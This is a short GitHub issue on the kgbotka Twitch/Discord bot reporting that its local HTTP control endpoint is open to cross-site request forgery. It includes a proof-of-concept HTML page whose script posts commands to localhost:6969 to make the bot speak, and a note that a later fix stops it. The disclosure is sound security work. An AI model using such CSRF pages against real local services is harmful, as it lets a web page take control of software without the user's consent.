Backdoor is vulnerable to CSRF attacks

tsoding / kgbotka

Twitch/Discord Chat Bot that works for KGB monkaS

https://twitch.tv/tsoding

MIT License

17 stars 1 forks source link

Backdoor is vulnerable to CSRF attacks #229

Open rexim opened 4 years ago

rexim commented 4 years ago

Start the bot
On the same machine open a browser and go to http://localhost:6969/
Observe the HTTP query from the browser in the kgbotka.log

rexim commented 4 years ago

Exploit:

<!DOCTYPE html>
<html>
  <head>
    <title>Not an Exploit Kapp</title>
  </head>
  <body>
    <h1>Ya got CSRF-ed bruh LOOOOL</h1>
    <script>
      const form = new FormData();
      form.append('cd', 'cd #tsoding');
      form.append('say', 'say you got CSRF-ed :)');
      fetch("http://localhost:6969/", {
        method: 'POST',
        body: form
      });
    </script>
  </body>
</html>

UPD Does not work after #230